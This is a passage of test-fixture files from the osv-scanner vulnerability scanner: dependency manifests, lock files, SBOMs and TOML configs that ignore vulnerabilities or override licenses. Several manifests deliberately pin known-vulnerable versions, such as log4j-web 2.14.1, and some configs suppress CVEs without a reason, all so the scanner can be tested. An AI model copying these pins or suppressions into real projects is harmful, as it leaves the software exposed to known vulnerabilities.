(but the nested one does ;) ================================================ FILE: cmd/osv-scanner/scan/source/testdata/locks-requirements/my-requirements.txt ================================================ flask==1.0.0 ================================================ FILE: cmd/osv-scanner/scan/source/testdata/locks-requirements/osv-scanner.toml ================================================ [[PackageOverrides]] ignore = true ================================================ FILE: cmd/osv-scanner/scan/source/testdata/locks-requirements/requirements-dev.txt ================================================ black==25.1.0 ================================================ FILE: cmd/osv-scanner/scan/source/testdata/locks-requirements/requirements-transitive.txt ================================================ numpy==2.3.1 -r requirements.txt ================================================ FILE: cmd/osv-scanner/scan/source/testdata/locks-requirements/requirements.prod.txt ================================================ django==2.2.24 # via # -r requirements.in # django-debug-toolbar # django-filter # django-storages # easy-thumbnails ================================================ FILE: cmd/osv-scanner/scan/source/testdata/locks-requirements/requirements.txt ================================================ flask==1.0.0 django==1.11.29 requests==2.20.0 ================================================ FILE: cmd/osv-scanner/scan/source/testdata/locks-requirements/the_requirements_for_test.txt ================================================ numpy==2.3.1 ================================================ FILE: cmd/osv-scanner/scan/source/testdata/locks-requirements/unresolvable-requirements.txt ================================================ flask==1.0.0 flask-cors==1.0.0 pandas==0.23.4 ================================================ FILE: cmd/osv-scanner/scan/source/testdata/locks-scalibr/Package.resolved ================================================ { "pins" : [ { 
"identity" : "swift-algorithms", "kind" : "remoteSourceControl", "location" : "https://github.com/apple/swift-algorithms.git", "state" : { "revision" : "b14b7f4c528c942f121c8b860b9410b2bf57825e", "version" : "1.0.0" } }, { "identity" : "swift-async-algorithms", "kind" : "remoteSourceControl", "location" : "https://github.com/apple/swift-async-algorithms.git", "state" : { "revision" : "9cfed92b026c524674ed869a4ff2dcfdeedf8a2a", "version" : "0.1.0" } }, { "identity" : "swift-atomics", "kind" : "remoteSourceControl", "location" : "https://github.com/apple/swift-atomics.git", "state" : { "revision" : "6c89474e62719ddcc1e9614989fff2f68208fe10", "version" : "1.1.0" } } ], "version" : 2 } ================================================ FILE: cmd/osv-scanner/scan/source/testdata/locks-scalibr/cabal.project.freeze ================================================ constraints: any.AC-Angle ==1.0, any.ALUT ==2.4.0.3, any.ANum ==0.2.0.2, any.Agda ==2.6.4.3, transformers-base +orphaninstances, any.Allure ==0.11.0.0, any.biscuit-haskell ==0.3.0.0, ================================================ FILE: cmd/osv-scanner/scan/source/testdata/locks-scalibr/depsjson ================================================ { "runtimeTarget": { "name": ".NETCoreApp,Version=v6.0", "signature": "" }, "compilationOptions": {}, "targets": { ".NETCoreApp,Version=v6.0": { "TestLibrary/1.0.0": { "dependencies": { "Microsoft.Extensions.DependencyInjection": "6.0.0", "Microsoft.Extensions.Logging": "6.0.0", "Newtonsoft.Json": "13.0.1", "Serilog": "2.10.0", "Serilog.Sinks.Console": "4.0.1", "TestCommon": "1.0.0" }, "runtime": { "TestLibrary.dll": {} } }, "AWSSDK.Core/3.7.10.6": { "runtime": { "lib/netcoreapp3.1/AWSSDK.Core.dll": { "assemblyVersion": "3.3.0.0", "fileVersion": "3.7.10.6" } } }, "Microsoft.Extensions.DependencyInjection/6.0.0": { "dependencies": { "Microsoft.Extensions.DependencyInjection.Abstractions": "6.0.0", "System.Runtime.CompilerServices.Unsafe": "6.0.0" }, "runtime": { 
"lib/net6.0/Microsoft.Extensions.DependencyInjection.dll": { "assemblyVersion": "6.0.0.0", "fileVersion": "6.0.21.52210" } } } } }, "libraries": { "TestLibrary/1.0.0": { "type": "project", "serviceable": false, "sha512": "" }, "AWSSDK.Core/3.7.10.6": { "type": "package", "serviceable": true, "sha512": "sha512-kHBB+QmosVaG6DpngXQ8OlLVVNMzltNITfsRr68Z90qO7dSqJ2EHNd8dtBU1u3AQQLqqFHOY0lfmbpexeH6Pew==", "path": "awssdk.core/3.7.10.6", "hashPath": "awssdk.core.3.7.10.6.nupkg.sha512" }, "Microsoft.Extensions.DependencyInjection/6.0.0": { "type": "package", "serviceable": true, "sha512": "sha512-k6PWQMuoBDGGHOQTtyois2u4AwyVcIwL2LaSLlTZQm2CYcJ1pxbt6jfAnpWmzENA/wfrYRI/X9DTLoUkE4AsLw==", "path": "microsoft.extensions.dependencyinjection/6.0.0", "hashPath": "microsoft.extensions.dependencyinjection.6.0.0.nupkg.sha512" }, "System.Linq.Dynamic.Core/1.3.7": { "type": "package", "serviceable": true, "sha512": "sha512-7J9oS95JCcyOtnKCr0tYUOMAj67Ee3WKal6li20vEeuQFdD7C4XuAABysp3H5dx+wmHkXuUNoxW3+U+OEsx+JQ==", "path": "system.linq.dynamic.core/1.3.7", "hashPath": "system.linq.dynamic.core.1.3.7.nupkg.sha512" } } } ================================================ FILE: cmd/osv-scanner/scan/source/testdata/locks-scalibr/gems.locked ================================================ PATH remote: .. 
specs: rubydns (2.0.2) async-dns (~> 1.0) GEM remote: https://rubygems.org/ specs: async (2.23.0) console (~> 1.29) fiber-annotation io-event (~> 1.9) metrics (~> 0.12) traces (~> 0.15) async-dns (1.4.1) async io-endpoint async-http (0.87.0) async (>= 2.10.2) async-pool (~> 0.9) io-endpoint (~> 0.14) io-stream (~> 0.6) metrics (~> 0.12) protocol-http (~> 0.49) protocol-http1 (~> 0.30) protocol-http2 (~> 0.22) traces (~> 0.10) async-pool (0.10.3) async (>= 1.25) console (1.29.2) fiber-annotation fiber-local (~> 1.1) json fiber-annotation (0.2.0) fiber-local (1.1.0) fiber-storage fiber-storage (1.0.0) geoip (1.6.4) io-endpoint (0.15.1) io-event (1.9.0) io-stream (0.6.1) json (2.10.1) metrics (0.12.1) nokogiri (1.18.2-arm64-darwin) racc (~> 1.4) nokogiri (1.18.2-x86_64-linux-gnu) racc (~> 1.4) process-daemon (1.0.1) rainbow (~> 2.0) protocol-hpack (1.5.1) protocol-http (0.49.0) protocol-http1 (0.30.0) protocol-http (~> 0.22) protocol-http2 (0.22.1) protocol-hpack (~> 1.4) protocol-http (~> 0.47) racc (1.8.1) rainbow (2.2.2) rake rake (13.2.1) traces (0.15.2) PLATFORMS arm64-darwin-21 x86_64-linux DEPENDENCIES async-http geoip nokogiri process-daemon rubydns! 
BUNDLED WITH 2.6.2 ================================================ FILE: cmd/osv-scanner/scan/source/testdata/locks-scalibr/osv-scanner.toml ================================================ [[PackageOverrides]] ignore = true ================================================ FILE: cmd/osv-scanner/scan/source/testdata/locks-scalibr/packages.config ================================================ ================================================ FILE: cmd/osv-scanner/scan/source/testdata/locks-scalibr/packages.lock.json ================================================ { "version": 1, "dependencies": { "net8.0": { "Newtonsoft.Json": { "type": "Direct", "requested": "[13.0.3, )", "resolved": "13.0.3", "contentHash": "HrC5BXdl00IP9zeV+0Z848QWPAoCr9P3bDEZguI+gkLcBKAOxix/tLEAAHC+UvDNPv4a2d18lOReHMOagPa+zQ==" } } } } ================================================ FILE: cmd/osv-scanner/scan/source/testdata/locks-test-ignore/osv-scanner-test.toml ================================================ [[IgnoredVulns]] id = "CVE-2021-23424" reason = "Test manifest file (package-lock.json)" ================================================ FILE: cmd/osv-scanner/scan/source/testdata/locks-test-ignore/osv-scanner.toml ================================================ [[PackageOverrides]] ignore = true ================================================ FILE: cmd/osv-scanner/scan/source/testdata/maven-transitive/abc.xml ================================================ 4.0.0 com.mycompany.app my-app 1.0.0 my-app http://www.example.com org.apache.logging.log4j log4j-web 2.14.1 ================================================ FILE: cmd/osv-scanner/scan/source/testdata/maven-transitive/encoding.xml ================================================ 4.0.0 com.mycompany.app my-app 1.0.0 my-app http://www.example.com junit junit 4.12 ================================================ FILE: cmd/osv-scanner/scan/source/testdata/maven-transitive/osv-scanner.toml 
================================================ [[PackageOverrides]] ignore = true ================================================ FILE: cmd/osv-scanner/scan/source/testdata/maven-transitive/parent.xml ================================================ 4.0.0 com.mycompany.app parent 1.0.0 my-app pom com.google.android.gms play-services 10.0.0 google-android https://dl.google.com/dl/android/maven2 ================================================ FILE: cmd/osv-scanner/scan/source/testdata/maven-transitive/pom.xml ================================================ 4.0.0 com.mycompany.app my-app 1.0.0 my-app http://www.example.com org.apache.logging.log4j log4j-web 2.14.1 ================================================ FILE: cmd/osv-scanner/scan/source/testdata/maven-transitive/registry.xml ================================================ 4.0.0 com.mycompany.app my-app 1.0.0 my-app com.mycompany.app parent 1.0.0 ./parent.xml org.apache.logging.log4j log4j-web 2.14.1 ================================================ FILE: cmd/osv-scanner/scan/source/testdata/osv-scanner-call-analysis-config.toml ================================================ [[PackageOverrides]] name = "stdlib" reason = "Just want to test actual packages" ignore = true ================================================ FILE: cmd/osv-scanner/scan/source/testdata/osv-scanner-complex-licenses-config.toml ================================================ [[PackageOverrides]] ecosystem = "npm" ignore = true license.override = ["0BSD"] [[PackageOverrides]] ecosystem = "Packagist" license.override = ["0BSD"] [[PackageOverrides]] ecosystem = "Alpine" name = "musl" license.override = ["UNKNOWN"] [[PackageOverrides]] ecosystem = "Alpine" name = "musl-utils" license.ignore = true # this takes priority over license.override license.override = ["UNKNOWN"] [[PackageOverrides]] ecosystem = "Alpine" name = "apk-tools" license.ignore = false [[PackageOverrides]] ecosystem = "Alpine" license.ignore = true 
================================================
FILE: cmd/osv-scanner/scan/source/testdata/osv-scanner-composite-config.toml
================================================
# Fixture mixing several override kinds. No entry pins a version, and only
# the Maven entry records a reason.

# Keyed on ecosystem alone: no package name is given.
# NOTE(review): presumably this matches every npm package; confirm against
# the config docs before copying the pattern into a real config.
[[PackageOverrides]]
ecosystem = "npm"
ignore = true

# Keyed on name alone; sets vulnerability.ignore rather than ignore.
[[PackageOverrides]]
name = "https://github.com/brendan-duncan/archive.git"
vulnerability.ignore = true

[[PackageOverrides]]
ecosystem = "Maven"
ignore = true
reason = "it makes the table output really really long"

# License-only overrides: neither entry sets an ignore flag.
[[PackageOverrides]]
ecosystem = "Packagist"
license.override = ["0BSD"]

[[PackageOverrides]]
ecosystem = "Alpine"
license.override = ["MIT"]

================================================
FILE: cmd/osv-scanner/scan/source/testdata/osv-scanner-duplicate-config.toml
================================================
# GO-2022-0274 is listed twice with different ignoreuntil dates; given the
# file name, presumably this exercises duplicate-entry handling.
[[IgnoredVulns]]
id = "GO-2022-0274"
ignoreuntil = 2020-01-01

[[IgnoredVulns]]
id = "GO-2022-0274"
ignoreuntil = 2022-01-01

# The remaining two entries carry neither an expiry date nor a reason.
[[IgnoredVulns]]
id = "GHSA-whgm-jr23-g3j9"

[[IgnoredVulns]]
id = "CVE-2025-26519"

================================================
FILE: cmd/osv-scanner/scan/source/testdata/osv-scanner-empty-config.toml
================================================
# An empty config file to override the ignore config

================================================
FILE: cmd/osv-scanner/scan/source/testdata/osv-scanner-expressive-licenses-config.toml
================================================
# The license.override values are compound license expressions
# (AND / OR / WITH, with parentheses) rather than single identifiers.
[[PackageOverrides]]
name = "babel"
license.override = ["MIT AND (LGPL-2.1-or-later OR BSD-3-Clause)"]

[[PackageOverrides]]
name = "human-signals"
license.override = ["LGPL-2.1-only OR MIT OR BSD-3-Clause"]

[[PackageOverrides]]
name = "ms"
license.override = ["MIT WITH Bison-exception-2.2"]

================================================
FILE: cmd/osv-scanner/scan/source/testdata/osv-scanner-invalid-licenses-config.toml
================================================
# Same three packages as the expressive-licenses fixture, each with an
# expression that is malformed in a different way.
[[PackageOverrides]]
name = "babel"
# Unbalanced: one closing parenthesis too many.
license.override = ["MIT AND (LGPL-2.1-or-later OR BSD-3-Clause))"]

[[PackageOverrides]]
name = "human-signals"
# Two consecutive OR operators with no operand between them.
license.override = ["LGPL-2.1-only OR OR BSD-3-Clause"]

[[PackageOverrides]]
name = "ms"
# WITH is followed by a parenthesised compound instead of a single
# exception identifier.
license.override = ["MIT WITH (Bison-exception-2.2 AND somethingelse)"]

================================================
FILE: cmd/osv-scanner/scan/source/testdata/osv-scanner-partial-ignores-config.toml
================================================
[[IgnoredVulns]]
id = "CVE-2025-26519" # in alpine.cdx.xml

[[IgnoredVulns]]
id = "CVE-2018-25032" # in alpine.cdx.xml

[[IgnoredVulns]]
id = "GO-2022-0274" # in postgres-stretch.cdx.xml

# ignoreUntil lies in the past (2020).
# NOTE(review): presumably this ignore has lapsed, so the finding is
# reported again; confirm against the config docs.
[[IgnoredVulns]]
id = "CVE-2019-5188"
ignoreUntil = 2020-01-01

# ignoreUntil lies far in the future (2100), so this entry presumably still
# suppresses the finding.
[[IgnoredVulns]]
id = "CVE-2022-1304"
ignoreUntil = 2100-01-01

================================================
FILE: cmd/osv-scanner/scan/source/testdata/osv-scanner-reasonless-ignores-config.toml
================================================
# Neither entry sets a reason, as the file name indicates.
# NOTE(review): a suppression with no reason and no expiry leaves no record
# of why the finding was accepted.
[[IgnoredVulns]]
id = "GHSA-whgm-jr23-g3j9"

[[PackageOverrides]]
ecosystem = "Packagist"
ignore = true

================================================
FILE: cmd/osv-scanner/scan/source/testdata/osv-scanner-unknown-config.toml
================================================
# RustVersionOverride, skip, the capitalised Name and license.skip appear in
# none of the neighbouring fixtures; given the file name they are presumably
# the deliberately unrecognised keys.
# NOTE(review): a mistyped key (skip instead of ignore) silently changes what
# is suppressed unless the loader reports unknown keys.
RustVersionOverride = "1.2.3"

[[PackageOverrides]]
ecosystem = "npm"
skip = true
license.override = ["0BSD"]

[[PackageOverrides]]
ecosystem = "Packagist"
license.override = ["0BSD"]

[[PackageOverrides]]
ecosystem = "Alpine"
Name = "musl"
license.override = ["UNKNOWN"]

[[PackageOverrides]]
ecosystem = "Alpine"
name = "musl-utils"
license.skip = true

[[IgnoredVulns]]
id = "GO-2022-0274"
ignoreuntil = 2020-01-01

================================================
FILE: cmd/osv-scanner/scan/source/testdata/sbom-insecure/alpine-zlib-16.cdx.json
================================================
{ "$schema": "http://cyclonedx.org/schema/bom-1.6.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.6", "version": 1, "metadata": { "timestamp": "2025-07-08T05:23:38Z", "tools": { "components": [ { "type": "application", "name": "SCALIBR", "externalReferences": [ { "url":
"https://github.com/google/osv-scalibr", "type": "website" } ] } ] }, "authors": [ {} ], "component": { "bom-ref": "a5add6de-55de-40a9-aa0d-1f03de5ab308", "type": "", "name": "" } }, "components": [ { "bom-ref": "6756e583-83d8-4a08-a573-d2e9506cbd93", "type": "library", "name": "zlib", "version": "1.2.12-r1", "purl": "pkg:apk/alpine/zlib@1.2.12-r1?arch=x86_64\u0026distro=3.22.0\u0026origin=zlib", "evidence": { "occurrences": [ { "location": "lib/apk/db/installed" } ] } } ] } ================================================ FILE: cmd/osv-scanner/scan/source/testdata/sbom-insecure/alpine.cdx.xml ================================================ 2023-03-02T12:04:22+11:00 anchore syft 0.73.0 alpine:latest sha256:fd6275a37d2472b9d3be70c3261087b8d65e441c21342ae7313096312bcda2b3 Natanael Copa <ncopa@alpinelinux.org> alpine-baselayout 3.4.0-r0 Alpine base dir structure and init scripts GPL-2.0-only cpe:2.3:a:alpine-baselayout:alpine-baselayout:3.4.0-r0:*:*:*:*:*:*:* pkg:apk/alpine/alpine-baselayout@3.4.0-r0?arch=x86_64&upstream=alpine-baselayout&distro=alpine-3.17.2 https://git.alpinelinux.org/cgit/aports/tree/main/alpine-baselayout apkdb-cataloger ApkMetadata apk cpe:2.3:a:alpine-baselayout:alpine_baselayout:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine_baselayout:alpine-baselayout:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine_baselayout:alpine_baselayout:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine:alpine-baselayout:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine:alpine_baselayout:3.4.0-r0:*:*:*:*:*:*:* sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed bd965a7ebf7fd8f07d7a0cc0d7375bf3e4eb9b24 331776 alpine-baselayout Q1/eXfmbYT1WXenFSqKjroYyK84NE= alpine-baselayout-data=3.4.0-r0 /bin/sh 8890 Natanael Copa <ncopa@alpinelinux.org> alpine-baselayout-data 3.4.0-r0 Alpine base dir structure and init scripts GPL-2.0-only cpe:2.3:a:alpine-baselayout-data:alpine-baselayout-data:3.4.0-r0:*:*:*:*:*:*:* 
pkg:apk/alpine/alpine-baselayout-data@3.4.0-r0?arch=x86_64&upstream=alpine-baselayout&distro=alpine-3.17.2 https://git.alpinelinux.org/cgit/aports/tree/main/alpine-baselayout apkdb-cataloger ApkMetadata apk cpe:2.3:a:alpine-baselayout-data:alpine_baselayout_data:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine_baselayout_data:alpine-baselayout-data:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine_baselayout_data:alpine_baselayout_data:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine-baselayout:alpine-baselayout-data:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine-baselayout:alpine_baselayout_data:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine_baselayout:alpine-baselayout-data:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine_baselayout:alpine_baselayout_data:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine:alpine-baselayout-data:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine:alpine_baselayout_data:3.4.0-r0:*:*:*:*:*:*:* sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed bd965a7ebf7fd8f07d7a0cc0d7375bf3e4eb9b24 77824 alpine-baselayout Q1/JgpM8J6DWI/541tUX+uHEzSjqo= 11664 Natanael Copa <ncopa@alpinelinux.org> alpine-keys 2.4-r1 Public keys for Alpine Linux packages MIT cpe:2.3:a:alpine-keys:alpine-keys:2.4-r1:*:*:*:*:*:*:* pkg:apk/alpine/alpine-keys@2.4-r1?arch=x86_64&upstream=alpine-keys&distro=alpine-3.17.2 https://alpinelinux.org apkdb-cataloger ApkMetadata apk cpe:2.3:a:alpine-keys:alpine_keys:2.4-r1:*:*:*:*:*:*:* cpe:2.3:a:alpine_keys:alpine-keys:2.4-r1:*:*:*:*:*:*:* cpe:2.3:a:alpine_keys:alpine_keys:2.4-r1:*:*:*:*:*:*:* cpe:2.3:a:alpine:alpine-keys:2.4-r1:*:*:*:*:*:*:* cpe:2.3:a:alpine:alpine_keys:2.4-r1:*:*:*:*:*:*:* sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed aab68f8c9ab434a46710de8e12fb3206e2930a59 159744 alpine-keys Q1KM01lfKVp+gEZn23awujqjSkrN8= 13361 Natanael Copa <ncopa@alpinelinux.org> apk-tools 2.12.10-r1 Alpine Package Keeper - package manager for alpine GPL-2.0-only cpe:2.3:a:apk-tools:apk-tools:2.12.10-r1:*:*:*:*:*:*:* 
pkg:apk/alpine/apk-tools@2.12.10-r1?arch=x86_64&upstream=apk-tools&distro=alpine-3.17.2 https://gitlab.alpinelinux.org/alpine/apk-tools apkdb-cataloger ApkMetadata apk cpe:2.3:a:apk-tools:apk_tools:2.12.10-r1:*:*:*:*:*:*:* cpe:2.3:a:apk_tools:apk-tools:2.12.10-r1:*:*:*:*:*:*:* cpe:2.3:a:apk_tools:apk_tools:2.12.10-r1:*:*:*:*:*:*:* cpe:2.3:a:apk:apk-tools:2.12.10-r1:*:*:*:*:*:*:* cpe:2.3:a:apk:apk_tools:2.12.10-r1:*:*:*:*:*:*:* sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed 0188f510baadbae393472103427b9c1875117136 307200 apk-tools so:libapk.so.3.12.0=3.12.0 cmd:apk=2.12.10-r1 Q1Ef3iwt+cMdGngEgaFr2URIJhKzQ= musl>=1.2 ca-certificates-bundle so:libc.musl-x86_64.so.1 so:libcrypto.so.3 so:libssl.so.3 so:libz.so.1 120973 busybox 1.35.0 cpe:2.3:a:busybox:busybox:1.35.0:*:*:*:*:*:*:* binary-cataloger BinaryMetadata binary cpe:2.3:a:busybox:busybox:1.35.0:*:*:*:*:*:*:* sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /bin/busybox Sören Tempel <soeren+alpine@soeren-tempel.net> busybox-binsh 1.36.1-r27 busybox ash /bin/sh GPL-2.0-only cpe:2.3:a:busybox-binsh:busybox-binsh:1.36.1-r27:*:*:*:*:*:*:* pkg:apk/alpine/busybox-binsh@1.36.1-r27?arch=x86_64&upstream=busybox&distro=alpine-3.17.2 https://busybox.net/ apkdb-cataloger ApkMetadata apk cpe:2.3:a:busybox-binsh:busybox_binsh:1.36.1-r27:*:*:*:*:*:*:* cpe:2.3:a:busybox_binsh:busybox-binsh:1.36.1-r27:*:*:*:*:*:*:* cpe:2.3:a:busybox_binsh:busybox_binsh:1.36.1-r27:*:*:*:*:*:*:* cpe:2.3:a:busybox:busybox-binsh:1.36.1-r27:*:*:*:*:*:*:* cpe:2.3:a:busybox:busybox_binsh:1.36.1-r27:*:*:*:*:*:*:* sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed 1dbf7a793afae640ea643a055b6dd4f430ac116b 8192 busybox /bin/sh cmd:sh=1.36.1-r27 Q1miWwyhWKXVEiRYLhmArV1TKMs6A= busybox=1.36.1-r27 1547 Natanael Copa <ncopa@alpinelinux.org> ca-certificates-bundle 20220614-r4 Pre generated bundle of Mozilla certificates MPL-2.0 MIT 
cpe:2.3:a:ca-certificates-bundle:ca-certificates-bundle:20220614-r4:*:*:*:*:*:*:* pkg:apk/alpine/ca-certificates-bundle@20220614-r4?arch=x86_64&upstream=ca-certificates&distro=alpine-3.17.2 https://www.mozilla.org/en-US/about/governance/policies/security-group/certs/ apkdb-cataloger ApkMetadata apk cpe:2.3:a:ca-certificates-bundle:ca_certificates_bundle:20220614-r4:*:*:*:*:*:*:* cpe:2.3:a:ca_certificates_bundle:ca-certificates-bundle:20220614-r4:*:*:*:*:*:*:* cpe:2.3:a:ca_certificates_bundle:ca_certificates_bundle:20220614-r4:*:*:*:*:*:*:* cpe:2.3:a:ca-certificates:ca-certificates-bundle:20220614-r4:*:*:*:*:*:*:* cpe:2.3:a:ca-certificates:ca_certificates_bundle:20220614-r4:*:*:*:*:*:*:* cpe:2.3:a:ca_certificates:ca-certificates-bundle:20220614-r4:*:*:*:*:*:*:* cpe:2.3:a:ca_certificates:ca_certificates_bundle:20220614-r4:*:*:*:*:*:*:* cpe:2.3:a:ca:ca-certificates-bundle:20220614-r4:*:*:*:*:*:*:* cpe:2.3:a:ca:ca_certificates_bundle:20220614-r4:*:*:*:*:*:*:* sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed e1839fd45a096c9e21ac24f8a61991d357d11628 237568 ca-certificates ca-certificates-cacert=20220614-r4 Q14PFUzkDXTGDcHkiuEdFuzb+EvxQ= 126296 Natanael Copa <ncopa@alpinelinux.org> libc-utils 0.7.2-r3 Meta package to pull in correct libc BSD-2-Clause BSD-3-Clause cpe:2.3:a:libc-utils:libc-utils:0.7.2-r3:*:*:*:*:*:*:* pkg:apk/alpine/libc-utils@0.7.2-r3?arch=x86_64&upstream=libc-dev&distro=alpine-3.17.2 https://alpinelinux.org apkdb-cataloger ApkMetadata apk cpe:2.3:a:libc-utils:libc_utils:0.7.2-r3:*:*:*:*:*:*:* cpe:2.3:a:libc_utils:libc-utils:0.7.2-r3:*:*:*:*:*:*:* cpe:2.3:a:libc_utils:libc_utils:0.7.2-r3:*:*:*:*:*:*:* cpe:2.3:a:libc:libc-utils:0.7.2-r3:*:*:*:*:*:*:* cpe:2.3:a:libc:libc_utils:0.7.2-r3:*:*:*:*:*:*:* sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed 60424133be2e79bbfeff3d58147a22886f817ce2 4096 libc-dev Q19Gg06pBPiiG9UN94ql7qImsHSUQ= musl-utils 1485 Ariadne Conill 
<ariadne@dereferenced.org> libcrypto3 3.0.8-r0 Crypto library from openssl Apache-2.0 cpe:2.3:a:libcrypto3:libcrypto3:3.0.8-r0:*:*:*:*:*:*:* pkg:apk/alpine/libcrypto3@3.0.8-r0?arch=x86_64&upstream=openssl&distro=alpine-3.17.2 https://www.openssl.org/ apkdb-cataloger ApkMetadata apk sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed 524302e205a5b43c2bb48d041bcb10ccf2b480f9 4206592 openssl so:libcrypto.so.3=3 Q1lyWpurYeMlLEt60ys+OlTABmzgs= so:libc.musl-x86_64.so.1 1710217 Ariadne Conill <ariadne@dereferenced.org> libssl3 3.0.8-r0 SSL shared libraries Apache-2.0 cpe:2.3:a:libssl3:libssl3:3.0.8-r0:*:*:*:*:*:*:* pkg:apk/alpine/libssl3@3.0.8-r0?arch=x86_64&upstream=openssl&distro=alpine-3.17.2 https://www.openssl.org/ apkdb-cataloger ApkMetadata apk sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed 524302e205a5b43c2bb48d041bcb10ccf2b480f9 622592 openssl so:libssl.so.3=3 Q1Z6/d/FKYkPehWzNtOtYnJ74oIkY= so:libc.musl-x86_64.so.1 so:libcrypto.so.3 246853 Timo Teräs <timo.teras@iki.fi> musl 1.2.3-r4 the musl c library (libc) implementation MIT cpe:2.3:a:musl:musl:1.2.3-r4:*:*:*:*:*:*:* pkg:apk/alpine/musl@1.2.3-r4?arch=x86_64&upstream=musl&distro=alpine-3.17.2 https://musl.libc.org/ apkdb-cataloger ApkMetadata apk sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed f93af038c3de7146121c2ea8124ba5ce29b4b058 634880 musl so:libc.musl-x86_64.so.1=1 Q1Pk7x1woArbB1nzkMPJPq1TECwus= 388955 Timo Teräs <timo.teras@iki.fi> musl-utils 1.2.3-r4 the musl c library (libc) implementation MIT BSD-2-Clause GPL-2.0-or-later cpe:2.3:a:musl-utils:musl-utils:1.2.3-r4:*:*:*:*:*:*:* pkg:apk/alpine/musl-utils@1.2.3-r4?arch=x86_64&upstream=musl&distro=alpine-3.17.2 https://musl.libc.org/ apkdb-cataloger ApkMetadata apk cpe:2.3:a:musl-utils:musl_utils:1.2.3-r4:*:*:*:*:*:*:* cpe:2.3:a:musl_utils:musl-utils:1.2.3-r4:*:*:*:*:*:*:* 
cpe:2.3:a:musl_utils:musl_utils:1.2.3-r4:*:*:*:*:*:*:* cpe:2.3:a:musl:musl-utils:1.2.3-r4:*:*:*:*:*:*:* cpe:2.3:a:musl:musl_utils:1.2.3-r4:*:*:*:*:*:*:* sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed f93af038c3de7146121c2ea8124ba5ce29b4b058 135168 musl cmd:getconf=1.2.3-r4 cmd:getent=1.2.3-r4 cmd:iconv=1.2.3-r4 cmd:ldconfig=1.2.3-r4 cmd:ldd=1.2.3-r4 Q1ZWJL4eySx8nPSjF1FAJgQyvuNs4= scanelf so:libc.musl-x86_64.so.1 36697 Natanael Copa <ncopa@alpinelinux.org> scanelf 1.3.5-r1 Scan ELF binaries for stuff GPL-2.0-only cpe:2.3:a:scanelf:scanelf:1.3.5-r1:*:*:*:*:*:*:* pkg:apk/alpine/scanelf@1.3.5-r1?arch=x86_64&upstream=pax-utils&distro=alpine-3.17.2 https://wiki.gentoo.org/wiki/Hardened/PaX_Utilities apkdb-cataloger ApkMetadata apk sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed e52243dbb02069f10d48440ccc5fd41fa5fc2236 98304 pax-utils cmd:scanelf=1.3.5-r1 Q11dxYFsHvBFAzzHGDo5gOTDNJDyQ= so:libc.musl-x86_64.so.1 37687 Sören Tempel <soeren+alpine@soeren-tempel.net> ssl_client 1.36.1-r27 EXternal ssl_client for busybox wget GPL-2.0-only cpe:2.3:a:ssl-client:ssl-client:1.36.1-r27:*:*:*:*:*:*:* pkg:apk/alpine/ssl_client@1.36.1-r27?arch=x86_64&upstream=busybox&distro=alpine-3.17.2 https://busybox.net/ apkdb-cataloger ApkMetadata apk cpe:2.3:a:ssl-client:ssl_client:1.36.1-r27:*:*:*:*:*:*:* cpe:2.3:a:ssl_client:ssl-client:1.36.1-r27:*:*:*:*:*:*:* cpe:2.3:a:ssl_client:ssl_client:1.36.1-r27:*:*:*:*:*:*:* cpe:2.3:a:ssl:ssl-client:1.36.1-r27:*:*:*:*:*:*:* cpe:2.3:a:ssl:ssl_client:1.36.1-r27:*:*:*:*:*:*:* sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed 1dbf7a793afae640ea643a055b6dd4f430ac116b 28672 busybox cmd:ssl_client=1.36.1-r27 Q1QuqZjeP6XG85I29tOiCWofL8Cj0= so:libc.musl-x86_64.so.1 so:libcrypto.so.3 so:libssl.so.3 4929 Natanael Copa <ncopa@alpinelinux.org> zlib 1.2.10-r0 A compression/decompression Library Zlib 
